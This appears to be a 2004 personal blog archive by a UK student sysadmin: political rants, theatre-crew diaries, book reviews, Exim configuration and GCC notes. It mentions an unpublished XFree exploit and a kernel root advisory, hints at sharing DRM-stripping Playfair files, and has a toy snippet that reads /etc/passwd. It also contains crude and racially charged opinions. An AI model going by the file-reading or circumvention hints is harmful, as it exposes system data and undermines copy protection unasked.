    NRh5FSGnWXd6dUdZQtnh7cz3CP2ujvYAxYhPBBgRAgAPBQJAiTCFAhsMBQkB4TOA
    AAoJEFgdlYtf04NQpcMAnR8qmZepHXtFyBvaMMBXXc8krdvwAJ9u6fkkiDbwVYuD
    7v0Wldd93FOdQA==
    =oxRB
    -----END PGP PUBLIC KEY BLOCK-----

    I like the Guardian, it's...

    I like the Guardian, it's generally a pretty good newspaper. But it really does print some utter crap sometimes.

    Joyti De-Laurey will shortly be sentenced for stealing several million pounds from some City squillionaires. But if there was any justice in this world, Joyti would not only be a free woman, she'd be given a medal for services to the community.

    So, it seems, robbing the rich and giving to the poor is not only ok within the confines of a representative democratic tax system, it's ok all the time. So I assume that he leaves his front door unlocked at night so that all the homeless poor people can rightfully rob him without risking hurting themselves while forcing the door.

    Somehow the writer manages the double-think that the victims (oh and, by the way, As crimes go, this was a victimless one) are both lazy and foolish (Fools and their money are soon parted) and hardworking (The trio were far too busy with their 6am meetings and long-distance business trips) at the same time.

    The writer also has an interesting grasp of economic reality: [their money] was just lying dormant in their accounts, doing nothing. I wonder if he has ever wondered where bank loans for buying his house, or starting the local businesses which serve his needs comes from. He might like to reflect that there's a word for when banks stop lending money - recession.

    It's just disappointing that writers with such a lack of rationality get printed in serious national press.

    US weapons in space [via ...

    US weapons in space [via JWZ].

    highly detailed plans for a whizbang space arsenal led by the "Rods From God" -- bundles of tungsten rods fired from orbiting platforms, hurtling toward earth at 3,700 meters per second, accurate within a range of 8 meters and able to destroy even the most hardened targets

    So, 3700 m/s gives 6.8 MJ/kg of energy. One tonne of TNT is 4612 MJ. So, in order to deliver a 1 tonne explosion they need to launch 674 kg of the stuff. For a one shot weapon. Now, the shuttle costs $50,000/kg to low earth orbit (source). That's $34 million dollars per megatonne. Or $30 million dollars per Fallujah strike, if you like.

    Still waiting for the dra...

    Still waiting for the draft ID cards bill, but if you want a little insight from New Labour try this from Sion Simon (Labour MP):

    I mean this civil liberties business I don't understand, what civil liberties implications, it's nonsense. I mean if you've done nothing wrong what are you frightened of?

    (BBC R4, Any Questions, 9th April 2004)

    So, ladies and gentlemen. Have an ID card - if you've done nothing wrong you have nothing to fear.

    Well, we're going to have...

    Well, we're going to have a referendum on the EU Constitution then. That means that I've got to read the damm thing and it's a huge tangle of politically correct nonsense for the most part.

    (For those who don't know how UK policy is announced these days: First there's the oblique comment (Blair on Radio 4 a few days ago), then there's the leak to the press (just now) then there's the full announcement (this week I expect).

    RSI

    Well, it's probably good for revision that I'm going to cut right down on typing now since I'm starting to feel the first signs of RSI. Probably because I have a crappy, self-taught typing style.

    I'm wondering about switching to Dvorak, but I've just been playing with it (my version of it) and it doesn't seem to help any. If anything, it's worse.

    Here's a time-lapse video...

    Here's a time-lapse video of the setup and strike of the Medics Fashion Show (you can see the photos here). It's WMV format (I didn't do it!) but it's not fuckwared and my install of mplayer can cope with it.

    dramsoc.wmv (50M)

    Looks like SourceForge ha...

    Looks like SourceForge have pulled the source to Playfair [/. story].

    See, as an act of civil disobedience against those who believe that code should be suppressed to enforce a huge increase in copyright powers I wish I had the source code to Playfair so that lots of people could download it and prove how futile pulling the code was.

    But all I have are these two random, 326K files. I wonder what I could do with those...

    Update: seriously, you people who can't figure it out are too dumb to use the program anyway!

    British people can now li...

    British people can now live happy in the knowledge that the Criminal Justice Act (2003) came into force yesterday:

    They enable police to retain fingerprints and DNA samples from anyone arrested - whether or not they are charged.

    The Home Office will look at whether police should be able to [drug] test all suspects arrested for offenses such as burglary and theft which are considered as "driving up" drug abuse.

    So what the Police want is a national DNA and fingerprint database, by the back door. If they actually tried to announce it, there would be dissent - and Labour are fed up with that after the whole tuition fees saga. So, slowly, they are going to build it anyway.

    You have to wonder how difficult it would be to setup a new political party. And `difficult' means `money' in this case. I think a 30-second TV slot would cost you about 250K, so 10M wouldn't even be a large advertising budget. I'm sure 5M would slip away all too quickly in other costs.

    In the 1997/8 fiscal year, corporate donations for the Conservatives (the biggest number) was about 2.8M - so one would need some significantly more generous investors.

    Hmm...

    A Summer Ball post

    Imperial College Union Summer Ball

    What's Wrong with Janus and friends

    Janus is Microsoft's new DRM (fuckware) system. The details are, frankly, unimportant - just only need to know this much:

    Janus would add a hacker-resistant clock to portable music players for files encoded in Microsoft's proprietary Windows Media Audio format. That in turn would help let subscription services such as Napster put rented tracks on portable devices--something that's not currently allowed. Fans of portable players could then pay as little as $10 a month for ongoing access to hundreds of thousands of songs, instead of buying song downloads one at a time for about a dollar a piece.

    This is wrong. This is bad. This is evil. This is why:

    Control

    This requires is trusted clock and this is a form of client-side security. That doesn't work, this has been known for many years. Unfortunately, these companies will and have used the legal system to try and make it work.

    Of course, content providers can only give music to trusted hardware - hardware that they trust to expire music. This means that the number of companies that can manufacture such hardware is very limited. It also means that since you have to go online to "renew" your music that they can disable any hardware at any time by not renewing.

    If you read the license agreement this will be one of their legal rights.

    No hardware manufacturer is going piss these people off on pain of a whole lot of angry customers or the loss of a manufacturing license. So they can invent any rights for themselves that they wish and it's protected by law (DMCA/EUCA).

    What rights? Well, at the moment they have invented the right to stop you fast-forwarding the legal warning/trailers on some DVDs (with compliant players). They lost control of the DVD player market so this isn't enforced. You can bet they're not going to make that mistake again.

    Public Domain

    Remember that after a certain number of years the government granted monopoly on a given work expires? Remember that last time you put on a Shakespeare play that you didn't have to pay his family/estate anything?

    Fine and dandy because when the copyright on these works expires you won't be able to play them anymore.

    Their control of this is enforced by hardware and never expires.

    History

    Go down to your local library. You can probably lookup editions of the local paper going back decades. This is our history.

    So when your TV news is subscription. And your paper is the digital edition. And your downloaded magazines are rented. Where's your history?

    This is wrong. This is bad. This is evil.

    Back on the good news...

    Lessig's new book is out in both dead-tree format and electronic, under a CC license.

    That's the good news. On the other hand...

    SciAm has published this, an interview with "the father of MP3" from which I'll pull a few quotes:

    The culture of theft that turns around MP3 is detestable.

    Misuse of the word theft in the usual RIAA-newspeak way.

    I don't see [iTunes etc] as a solution in the long run, because they put too many limits on the users.

    Ok, good

    What we need is a system that guarantees the protection of copyrights but at the same time is completely transparent and universal. With the Digital Media Project [DMP] we are working to develop a format that meets these requirements.

    For example, you could play a specific title until a certain date, or you could buy a subscription allowing you to play anything you want for a given period.

    the algorithms used for copyright protection don't come as hardware but as software, so that you can update them with an Internet or wireless connection if they are cracked.

    Hmm, I'm betting that this `father of MP3' is a manager. It would take years of training to come out with such wooly worded crap. "It's open" yet you can be time limited. "It's not-crack proof" yet people will (willingly?) download updates to `fix' their players.

    And their website is, as expected, full of utter rose-tinted rubbish.

    Seriously, how do people get away with not putting a single hours thought into these systems?.

    It turns out that Apple have very neatly managed to use the RIAA's stupidity against them by having a DRM free service and just telling the RIAA that it's protected. Genius.

    The Ends of the Earth (Br...

    The Ends of the Earth (Bruce Sterling)

    Why do people bother with...

    Why do people bother with quantum cryptography? (and they do, companies exist that will supply QC products if you have the money). Wouldn't quantum entanglement cryptography achieve the same without a dedicated fiber link? Or are the practical problems with QEC really that bad?

    Something to ask Pooh next time I see him.

    Gary's shoe: Ewwwwwwwww! ...

    Gary's shoe: Ewwwwwwwww! Really, really yuck.

    But seriously, we rock.

    Katie Melua: Call off the Search

    Ok, so a few reviews that I've been meaning to get round to...

    So this album has hit 4x platinum but I'm not quite sure why. I like it - quite a lot actually - but I'm still a little confused where this hidden hunger for `country' music has come from in the general population. Of course, it's not called country music because that doesn't sell but it sounds like country/folk music. It's certainly not jazz.

    But for those who thought that Norah Jones was a one off, the copycats are proving them wrong. At the top of the charts at the moment is the second Norah Jones, this album and "20 Something".

    Now, I think that Mrs Melua has a better voice than Mrs Jones. I know that's a pretty flammable statement in some places but I think that the recording on this album is just better than Come Away With Me. A bit like Road to Perdition - a very beautiful work and a welcome break between more exciting stuff. But no substitute.

    Greg Egan: Luminous

    It's fairly common knowledge to readers of IV that I'm quite a big fan of Greg Egan. In fact, a browse of his website shows that I've almost read every book he has in print.

    Luminous is a collection of short stories and this actually means that you get a higher "cool idea" frequency than in some of his novels. One of the stories is pretty forgettable, but all the rest are classic Egan. A number of the stories hammer home the conclusions of a Strong AI belief - something that the world is going to have to come to grips with at some point (I believe so, as a Strong AIist, of course. Others don't). The title story is very Godel, Escher Bach dealing, as it does, with axiomatic systems.

    I'm not going to write a list of the others here. Borrow the book off me if you want to find out. Highly recommended.

    Iain M. Banks: Excession

    This is the first Iain M. Banks book that I've read. People have been mentioning him to me for ages and I finally read one on the train to (and from) Cardiff.

    Now, this a political novel - not science fiction. It may be set in space with spaceships and the like - but that doesn't make it science fiction. Greg Egan is sci fi - this is space opera.

    But as far as political novels go, it's very good. Almost excellent in fact. But I don't feel that I would have missed anything by not reading it (except for the best ship names in a book, ever). Something to read as the miles go by.

    Well, Imperial College pl...

    Well, Imperial College played host to the BBC in the form of Question Time on Thurs. (The one where a cabinet minister said "When Gordon Brown became Prime Minister"). Then we struck it - TV really isn't all that impressive. It looks ok to the edges of the camera's field of vision then it's just cables everywhere. The lighting rig was fairly impressive, but the sound was nothing to write home about.

    I've a (telephone) interview with Google for a summer job this year. And congrats to Gary, Steve and Mike who've all sorted out jobs for when they leave Imperial.

    In to College for 9am tomorrow. And don't forget that it's Mothers Day.

    This is just ... well, al...

    This is just ... well, almost amusing. But in that "laugh because you don't know what else to do" way [via WhiteRose, source]

    WHAT do you give someone who's been proved innocent after spending the best part of their life behind bars, wrongfully convicted of a crime they didn't commit?

    An apology, maybe? Counselling? Champagne? Compensation? Well, if you're David Blunkett, the Labour Home Secretary, the choice is simple: you give them a big, fat bill for the cost of board and lodgings for the time they spent freeloading at Her Majesty's Pleasure in British prisons.

    On Tuesday, Blunkett will fight in the Royal Courts of Justice in London for the right to charge victims of miscarriages of justice more than £3000 for every year they spent in jail while wrongly convicted. The logic is that the innocent man shouldn't have been in prison eating free porridge and sleeping for nothing under regulation grey blankets.

    Though now I come to think about it, there's a prison near White City I believe, and £3000/year is a lot cheaper than what I'm paying now. I wonder if they would consider renting?

    IPRED

    Fluffy BBC introduction if you don't know what IPRED is.

    In red, the FFII (from here), and in blue, the text of the directive (taken from here

    Anton Piller orders (secret court authorisations of raids for evidence by the plaintiff's agents)

    Member States shall ensure that even before the commencement of proceedings on the merits of the case the competent judicial authorities may, on application by a party who has presented reasonably available evidence to support his claims that his intellectual property right has been infringed or is about to be infringed, order prompt and effective provisional measures to preserve relevant evidence in regard to the alleged infringement.

    It's very unclear in the document as to who takes the action. Firstly, the /. crowd are wrong that this gives a right to corporate raids - you still need judicial authorities to sign off on it. We shall have to see how this is written into national law.

    Mareva injunctions (freezing of assets, even before a case has been discussed in Court.

    In cases of infringement committed on a commercial scale, ... the judicial authorities may order the precautionary seizure of the movable and immovable property of the alleged infringer, including the blocking of his bank accounts and other assets.

    Member States shall ensure that the provisional measures referred to in paragraphs 1 and 1a may, in appropriate cases, be taken without the defendant having been heard.

    The FFII seems to be perfectly correct on this one.

    New powers to demand the disclosure of very extensive commercial and personal information.

    Well, you can look at Article 9 yourself, it goes on a long while. But my reading of it is that the FFII is correct.

    And the admissibility of denounciations by anonymous witnesses as court evidence.

    Member States may take measures to protect witnesses' identity.

    Right on again.

    We'll have to fight at the national level now. I'm getting tired of this.

    It's pretty wrong for me ...

    It's pretty wrong for me to ridicule specific DoC support requests here. But it's so tempting, (mentioning no names...). Today alone, I've already had one person ask if /usr/sbin/sendmail -t is going to work on our Windows ASP server (and there's no confusion here, he's absolutely aware that it's a Windows box).

    And to round it off, someone asked if they should delete their root filesystem when trying to free up some space because it's several gigabytes big.

    Oh boy.

    I've been away for the we...

    I've been away for the weekend. So if you've not heard back from me in a couple of days - that's why. I'm going through my email now.

    Friday night was spent stage teching Tokyo Dragons (pictures). MTV were filming this event, and they are meant to be a major band for some reason. I thought they were ok, but nothing special.

    Though their bass guitarist did make his own amp, so they gain credits for that.

    Yes, I've got 32. I'll be...

    Yes, I've got 32. I'll be in tomorrow morning.

    Well, a kernel upgrade of...

    Well, a kernel upgrade of the Union server on Tuesday showed that 2.4.25's XFS support is incomplete. It contains some of XFS, but not enough to actually get a working server (I need ACL support at least). And I can't find patches to add the missing bits to 2.4.25 either. Bugger.

    The medic's play (Alice in Wonderland) on in the UCH at the moment is very good. Go see it tonight (£6) or tomorrow (£7) starting at 7:30 (ish).

    Last night's band night with Natascha Sohl went very well. She's very good and my favorite band that we've worked with so far. Proper control of the lighting by Steve meant that it looked very good too.

    And we're doing it all again tomorrow, but with three bands and (at least) one film crew. That includes three drum kits that we've got to handle somehow. And I've got other commitments for part of tomorrow night.

    Also, I'm on Orkut now. Mail me if you need an introduction.

    (Though I'm home this weekend (and Monday) so I've very little email access.)

    And tonight was going to be my night off and the first time I haven't been doing something in the Union this week. But the Medic's director just phoned so I'm going to help them now... oh well.

    These are predictions fro...

    These are predictions from a "leaked Pentagon report" that were published in The Observer today (news section, page 3).

    I just want them here so I can look back in a few years time.

    • Future wars will be fought over the issue of survival rather than religion, ideology or national honour.
    • By 2007 violent storms smash coastal barriers rendering large parts of the Netherlands inhabitable. Cities like The Hague are abandoned.
    • Between 2010 and 2020 Europe is hardest hit by climatic change with an average annual temperature drop of 6F. Climate in Britain becomes colder and drier as its weather begins to resemble Siberia's.
    • Deaths from war and famine run in the millions as the population is reduced until the Earth can cope.
    • Riots and internal conflict tear apart India and Indonesia.
    • Access to water becomes a major battleground. The Nile, Danube and Amazon are all at high risk.
    • A 'significant drop' in the planet's ability to sustain its population will become apparent over the next 20 years.
    • Rich areas like the US and Europe would become 'virtual fortresses' to prevent millions of migrants from entering after being forced from land drowned by sea-level rise or no longer able to grow crops.
    • Nuclear arms proliferation is inevitable. Japan, South Korea, and Germany develop nuclear-weapons capabilities , as do Iran, Egypt and North Korea. Israel, China, India and Pakistan also are poised to use the bomb.
    • By 2010 the US and Europe will experience a third more days with peak temperatures above 90F . Climate becomes an 'economic nuisance' as storms, droughts and hot spells create havoc for farmers.
    • More than 400m people in subtropical regions at risk.
    • Europe will face huge internal struggles as it copes with massive numbers of migrants arriving at its shores. Southern Europe is beleaguered by refugees from hard-hit Africa.
    • Mega-droughts affect the world's major breadbaskets, including America's Midwest, where strong winds bring soil loss.
    • China's huge population make it particularly vulnerable. Bangladesh becomes nearly uninhabitable because of a rising sea level, which contaminates inland water supplies.

    New kernel bug. All upgra...

    New kernel bug. All upgrade to 2.4.25 or 2.6.3. DoC backend webserver compiling now and will be rebooted in a minute. Union server waiting for GR patch against 2.4.25.

    Ok, a slightly political ...

    Ok, a slightly political entry today...

    Firstly, I tip my hat to the people behind a new scholarship created for whites only. And I hope it enrages every racist black organisation simply because I want to see them defend their black only scholarships and attack this at the same time. A wonderful example of why racism by white people is racist and racism by black people is `positive action'.

    Next up, a Guardian article today (page 3): Goodbye ecstasy, hello 5-Meo-DMT. It's only in their paper and beta-test editions, so no link I'm afraid.

    It discusses the increasing use of chemicals that are legal in the US, but illegal here, such as 5-MeO-[DMT|DiPT] and 2C-[B|I]. Now these chemicals are still fairly rare and I've never even heard of anyone taking them. (But don't confuse 5-MeO-DMT with regular N,N-DMT, which is much older and common).

    The rapid growth in the transatlantic online trade in such chemicals has been fueled by international differences over legality. While Britain has outlawed all of these drugs under an amendment to the Misuse Of Drugs Act in February 2002 they remain legal in most other countries, including the majority of EU member states. Even in the US, despite some of the most draconian anti-drug laws in the world, the bulk of research chemicals are legal to manufacture, sell, possess and consume.

    The leading research chemical sites compete openly to offer the purest product, the best customer service, the fastest deliveries and the lowest prices. Sophisticated e-commerce technology, electronic payment systems and next day courier services guarantee swift, effortless "one-click" transactions

    The EU recently recommended that member states ban 2C-I as a matter of urgency, although they turned up no evidence of large-scale manufacture. The police, however, were quick to sound the alarm. "The chemicals to make this are available and it can be made pretty much anywhere," a source said.

    Nowhere have we had the slightest justification of the banning of these chemicals. It's not even discussed - they don't even try to give reasons. We have now reached the point where "drugs are baadd" is an axion of our society.

    I'm perfectly free to go jump out of a plane. A totally unconstructive, reckless act that serves no end but by own pleasure. People who trek across the Arctic are heros. Those who die are tragic.

    Those who ingest 2,5-Dimethoxy-4-Iodophenethylamine are criminals and those who die are used to justify the banning of it. Although, it seems, we don't even need that any more.

    Now, I'm not saying that experimenting with these drugs is a good idea. Frankly, experimenting with new drugs is pretty damm stupid as far as I'm concerned. But I'm not going to stop anyone else from trying it.

    And what effect does banning every psychoactive chemical have on research? Most research grant boards won't go near these areas. It's just not worth the bother and we don't know what damage this is doing to medical knowledge because we won't even investigate it.

    Next time you're preached to about the dangers of drugs. Just wonder to yourself about how many of those dangers are caused by the prohibition that they are used to justify. Better yet, wonder out loud because that's either called circular reasoning or bullshit depending on your company.

    If you didn't see this on...

    If you didn't see this on /., you really should read it: Economist: I get a kick out of you

    I've written an exploit f...

    I've written an exploit for the XFree vunl that has been doing the rounds for my talk on Tuesday. (That I've got to write this weekend).

    Next Tuesday is sysadmin security and the week after is programming security. (1 o'clock, 308/311). I'll be pulling the exploit apart in the second of them. It's a little different than the usual kiddie exploits because X isn't suid on DoC systems.

    And Silwood still haven't told me if they'll upgrade their power supply for the PhySoc Summer Ball, and I can't confirm any hires really until I know what I'm doing about that.

    And the ICU Summer Ball may be off. East meet West lost money, I'm pretty sure that International Night did too.

    Oh, wonderful. What a bea...

    Oh, wonderful. What a beautiful morning on which we find critical vulnerabilities in the following:

    • Windows 2000/XP/2003/NT (SYSTEM level remote exploit)
    • XFree (local root)
    • vim
    • And MyDoom has created a whole new zombie network...

    Well, Oskar can rest easy...

    Well, Oskar can rest easy, Joel told me to bugger off.

    And, it seems, censorship is once again, the answer to everything these days.

    Things to look forward to

    Well, the first set of patches for GCC 3.5 have gone into the mm kernel tree so we can start looking forward to the release of 3.4 soon.

    The change log is here, and I'd like to highlight a few points:

    Firstly, precompiled headers. This could be a huge gain for large compile runs (KDE anyone?). Basically the compiler can preprocess C/C++ headers and so not have to repeatedly compile them for each unit (read .c or .cc file). Quoting from a snapshot gcc manual (raw texi docs):

    To create a precompiled header file, simply compile it as you would any other file, if necessary using the @option{-x} option to make the driver treat it as a C or C++ header file. You will probably want to use a tool like @command{make} to keep the precompiled header up-to-date when the headers it contains change.

    A precompiled header file will be searched for when @code{#include} is seen in the compilation. As it searches for the included file (@pxref{Search Path,,Search Path,cpp,The C Preprocessor}) the compiler looks for a precompiled header in each directory just before it looks for the include file in that directory. The name searched for is the name specified in the @code{#include} with @samp{.gch} appended. If the precompiled header file can't be used, it is ignored.

    For instance, if you have @code{#include "all.h"}, and you have @file{all.h.gch} in the same directory as @file{all.h}, then the precompiled header file will be used if possible, and the original header will be used otherwise.

    If you need to precompile the same header file for different languages, targets, or compiler options, you can instead make a @emph{directory} named like @file{all.h.gch}, and put each precompiled header in the directory. (It doesn't matter what you call the files in the directory, every precompiled header in the directory will be considered.) The first precompiled header encountered in the directory that is valid for this compilation will be used; they're searched in no particular order.

    A precompiled header can't be used once the first C token is seen. You can have preprocessor directives before a precompiled header; you can even include a precompiled header from inside another header, so long as there are no C tokens before the @code{#include}.

    The precompiled header file must be produced by the same compiler version and configuration as the current compilation is using. The easiest way to guarantee this is to use the same compiler binary for creating and using precompiled headers.

    Any macros defined before the precompiled header (including with @option{-D}) must either be defined in the same way as when the precompiled header was generated, or must not affect the precompiled header, which usually means that the they don't appear in the precompiled header at all.

    Next up, several GCCisms have been removed. This is a shame as I've been known to use the first two of these in some code (that, frankly, wasn't portable anyway).

    • cast-as-lvalue: (char) i = 5;
    • conditional-expression-as-lvalue: (a ? b : c) = 2;
    • compound-expression-as-lvalue: (a, b) = 2;

    (maybe the C standard will include these someday. Unfortunately, the GCC people don't give a rational for removing them.)

    We also have a new unit-at-a-time compilation system for C. This allows inter-procedural optimisations. This is mostly useful for optimising static functions as GCC can now change the calling-convention for these and so forth.

    And we have make profiledbootstrap which uses the profile-feedback code from 3.3 (which is much improved in 3.4) when building the compiler. GCC claims "an 11% speedup on -O0 and a 7.5% speedup on -O2" (i386, building C++).

    Now, the question is, am I brave enough to run a snapshot? Probably not I'm afraid.

    Someone makes an obvious ...

    Someone makes an obvious discovery about Bayesian filtering the very long way round and it warrents a BBC News article. Geeze. No wonder these worms find enough stupidity to spread.

    Update: Yes, I know it's the POPFile author. Doesn't mean that he's not being an idoit. He could just have opened the Bayesian db to check which words had a high positive value. Probably the BBC journalist had something to do with the crapness however.

    Christ, it's been a long ...

    Christ, it's been a long few days. I haven't even seenn one of my house mates since Tuesday and, if she didn't leave washing up to be done, I wouldn't even know if she were alive.

    So, Wednesday was band night in dB's. Sound teching again, but this time with ear defenders which work really well. The control position in dB's is about 5 meters from a speaker stack that is pointed straight at you and it's nice not to be deaf afterwards.

    Thursday was East Meets West, the Indian Society variety show. Gary has a fairly long post about it. Turns out that they has no stage crew and were just praying that it would work out or something. Either that or they expected stuff to shuffle into place on its own. So, with a couple of hours notice and a couple of phone calls we got 4 Dramsoc people to run the stage.

    And I would like to point out that we were flawless. Even though we usually found out about a scene change about 5 minutes before it happened. Some people may complain that we missed a chair, but 13 were counted on, 13 people were on stage and they were one short. Fourteen were counted off. Go figure.

    They overran and were kicked off at about midnight. The strike only took about one and a half hours because they got away with having parcan bars and there was no lift involved. Usually when striking we have to break everything down into lift-sized chunks which takes ages. Though I didn't really grasp exactly how much of a pain this was until now.

    Last night was ChiSoc. This show was going to be an utter shambles from the start. Organisation seems be an alien concept here. They overran by about three hours because all their scene changes took 10 minutes or so.

    It's not that they were big scene changes at all, but it took 10 minutes to figure who was going on next. All this was sorted about by shouting a lot of shouting in (I believe) Cantonese over the comms.

    They also shouted "Fire!" a lot when talking. I didn't figure out what this meant to them.

    And it seems that they killed one radio mic, has no stewards and thought the powerloc distro (415V, 600 amps) was a good place to keep bottles of water.

    At least I'll never have ...

    At least I'll never have the chance to fuckup this badly. (You hope!)

    Oh, and via /., Joel has written an article on writing resumes. And this is a few weeks after I submitted mine to him! (Not kidding, he's writing about submissions including mine.)

    And while I'm ranting...

    I was pleasantly surprised to come across a stall giving away free cups of instant coffee today. Instant coffee manufacturers are always welcome to solicit my custom with free stuff seeing as how I've never purchased instant coffee in my life and don't intend to.

    (As far as I'm concerned, coffee exists primarily for its caffeine content and is best expressed as an expresso. Good tasting coffee is rare and never found as a cup of anything that started out looking like powdered turd.)

    As I was sipping the free cup of tongue crematingly hot sludge my eyes slipped down to the sign advertising free decaffeinated coffee.

    It goes without saying that it went into the bin with my hand following a smooth arc after an aborted initial motion towards my mouth.

    How can there be enough flavor flummoxed fools on the planet buying this ungodly example of utterly missing the point, to make a market for decaffeinated coffee?

    An open letter to Stephen Fry:

    Dear Mr Fry,

    The command of language and humor, demonstrated in your book, is almost flawless.

    However, I must protest that the book would be immeasurably improved by omitting the entire chapter given to graphically describing a small child fucking a horse.

    Thank you

    Next week, (more for my r...

    Next week, (more for my reference than anything else)

    • Monday: Get Summer Ball sponsorship pack together
    • Tuesday: Lecture (e.g. I'm giving one) at 1pm, Hux308
    • Wednesday: Sound teching for the band night in the Union
    • Thursday: East meets West strike
    • Friday: Chisoc

    I've put the source to th...

    I've put the source to the suexec code which runs the Union server here

    And, before I forget, here's a patch for PHP 4.3.4 which fixes permissions on uploaded files in sticky dirs (or dirs with ACLs in my case).

    And I knocked together Kiss or Miss for the College RAG (charity fundrasing) week, last night. Still needing a little work. The idea is that people can donate to get their score bumped up :)

    Back in contact with the ...

    Back in contact with the world again... photos from Friday night. Listening to: Cats, reading: The Hippopotamus.

    And talking of cats, we got a leaflet through the door from the local vets saying "Have you seen Humphrey, our practice cat?". Wouldn't it suck to be a vet's practice cat? Any time someone's unsure how to do something - you get it. Imagine being neutered .. repeatedly :)

    The program for CodeCon 2...

    The program for CodeCon 2004 is up.

    Can I suggest that the 10...

    Can I suggest that the 100 most often misspelt English words[via Keith] are, in fact, misspelt in the dictionary and that if a word is commonly misspelt then it reflects badly on the word, not the people?

    Phew. The union server up...

    Phew. The union server upgrade kind-of went to plan. Would have gone more smoothly if I had known the correct default gateway. However, one thing really did mess me up: MySQL.

    If you remember just never to use the minus charactor in the name of anything mysqlish, then it's a good little database. But if you do, oh dear. I've filed several bugs about this and the MySQL developers are arguing about how valid the minus sign is, the code certainly has no idea.

    mysqldump generally gets quoting correct - except when it comes to the minus charactor at which point CREATE TABLE stops working. Now, when you're importing hundreds of tables you don't see the little error message shoot by with all the status messages (even in `quite' mode). But it turns out that you need to add the --quote-names option to the dump in order for it to do CREATE TABLE correctly. Which is a huge bodge to start off with, because (almost) everything else works fine.

    But wait until you get a minus sign in a database name. Now, not only does it not restore the database correctly, it actually errors on the USE statement and goes spewing tables into other databases. And even if you quote the database names, MySQL still can't handle it. At this point I just changed minus to underscore and said bugger it.

    Also, openssh 3.7 and onwards can't to PAM support correctly, so I'm sticking to 3.6.1 for now.

    While I'm posting I might...

    While I'm posting I might as well point out this link via Wes to a PDF on the marks on euro notes that machines recognise as bank notes. That's another great piece of work by Markus Kuhn.

    Spent all day configuring...

    Spent all day configuring the new mail servers at DoC. Some useful Exim snippets for future reference are below.

    Oh, and someone dug through a very important London backbone fibre this morning which took IV off the face of the net.

    This weekend is going to involve a few trial runs of the Union webserver move that I'm doing on Monday for real.

    Virtual hosting

    domainlist local_domains = @ : cdb;VHOSTCONFIG
    # Vhost routing
    vhost_aliases:
      driver = redirect
      allow_fail
      allow_defer
      domains = cdb;VHOSTCONFIG
      data = ${lookup{$local_part}nwildlsearch{${lookup{$domain}cdb{VHOSTCONFIG}}}}
      file_transport = address_file
      pipe_transport = address_pipe
      no_more

    Spam Checking with spamd

    spamcheck_router:
      driver = accept
      # ! already spam AND ! already scanned AND from offsite AND !SMTP AUTHed
      condition = "${if and { {!def:authenticated_id} {!def:h_X-Spam-Flag:} {!eq {$received_protocol}{spam-scanned}} {!eq {$received_protocol}{local}} {!match{$sender_host_address}{^(146\.169\.|155\.198\.4\.76)}} } {1}{0}}"
      transport = spamcheck
      no_verify
    ## Spam Assassin
    spamcheck:
        driver = pipe
        command = /usr/sbin/exim -i -oMr spam-scanned -f "${if eq {${sender_address}}{} {mailer-daemon} {${sender_address}} }" -- ${local_part}
        transport_filter = /usr/bin/spamc
        home_directory = "/tmp"
        current_directory = "/tmp"
        # must use a privileged user to set $received_protocol on the way back in!
        user = exim
        group = exim
        log_output = true
        return_fail_output = true

    SMTP AUTH over TLS using Kerberos via PAM

    # SMTP AUTH Settings (see also Authenticators at the bottom)
    
    auth_advertise_hosts = *
    received_header_text = "Received: ${if def:sender_fullhost {from ${sender_fullhost} ${if def:sender_ident {(${sender_ident})}}} {${if def:sender_ident {from ${sender_ident} }}}} \n\t by ${primary_hostname} ${if def:received_protocol {with ${received_protocol}}} \n\t ${if def:tls_cipher {(tls_cipher ${tls_cipher})}} ${if def:tls_peerdn {(tls_peerdn ${tls_peerdn})}} (Exim ${version_number} ${compile_number} (DoC)) \n\t id ${message_id} ${if def:authenticated_id { \n\t from user $authenticated_id}}"
    plain:
      driver = plaintext
      public_name = PLAIN
      server_condition = ${if pam{$2:${sg{$3}{:}{::}}}{yes}{no}}
      server_set_id = $2
    #  server_advertise_condition = ${if eq{$tls_cipher}{}{no}{yes}}
    
    login:
      driver = plaintext
      public_name = LOGIN
      server_prompts = "Username:: : Password::"
      server_condition = ${if pam{$1:${sg{$2}{:}{::}}}{yes}{no}}
      server_set_id = $1
    #  server_advertise_condition = ${if eq{$tls_cipher}{}{no}{yes}}

    IV now sports a brand new...

    IV now sports a brand new "JanieBox" at the top right (or possibly somewhere random if your browser doesn't do CSS very well).

    I'm getting the data from here (or more specifically from here). I've probably got the code wrong, but if you want to point it out to me the code is here

    Oh, and it's doing the US Dollar to British Pound exchange rate, for those who hadn't guessed.

    New kernel local root problem

    Hitting all current (inc 2.6) kernels. Get 2.4.24

    http://isec.pl/vulnerabilities/isec-0013-mremap.txt

    I read three [1, 2, 3 all...

    I read three [1, 2, 3 all via IP, via Keith] very good essays by Michael Crichton this morning. Now Crichton has written a couple [1, 2] of fairly noddy books recently. They weren't bad, but I couldn't help thinking that they had been written in order to become a film script (worked for one of them).

    But his essays are top-notch (and is DDT seriously not carcinogenic?). I have to be a little concerned about number three because, although I know many moronic environmentalists, I have to wonder if things wouldn't be a lot worse without them. Painful as it is to say. But they really cheered me up in contrast to all the "They did what? The morons" stories.

    This could be a Stage Sca...

    This could be a Stage Scan with a light on, right?

    screenshot

    I know the real thing isn't translucent like that, but it makes things clearer in the visualizer.

    (p.s. If you're not a member of Dramsoc you probably don't understand this post)

    Pinging

    Lython [via LtU] is a Lisp like frontend onto Python. Now I've been meaning to write one of these for sometime, good that someone has at last. For example:

    # -*- lisp -*-
    
    (def foo (a)
         (print "one")
         (print "two")
         (* a 5))
    
    (def bar (b c)
         (* b c))
    
    (def cat (file)
         (:= f (open file))
         (f.read))
    
    (print (foo "test"))
    (print (bar 5  5))
    (print (cat "/etc/passwd"))

    (and, yes, it can do simple macros)

    Firstly, the Clueless Anti-Whitespace Morons might be a little happier but that's unimportant. Mainly Lython has the ability to become the standard Lisp-like-language that Lisp has needed for a long time. As much as ANSI Common Lisp is a good (if huge) standard it still leaves far too much platform specific stuff undefined. The kind of stuff that makes code actually useful. And Lython has all the Python libraries to draw upon.

    Now Python just needs to get it's basic language features working. Even in 2.3 this still doesn't work:

    def a(x):
      x = 0
      def b():
        x += 1
        return x
      return b

    Since Keith requested it, my build script now pings blo.gs. Due to the (cack-handed) nature of the way I do things it might `bounce' a little (e.g. update more than once for a single update) but blo.gs already seems to dampen that.

    Ah, you've got to love th...

    Ah, you've got to love the post-Christmas sales. In fact, I'm loving them to the tune of:

    The soundcard is a little odd, but it's got the best audio quality of anything in its range that I could find a review for.

    And god it sounds good. Only slight problem - I've had to remove most of the 128Kbs (and below) mp3s from my playlist. Use FLAC people!

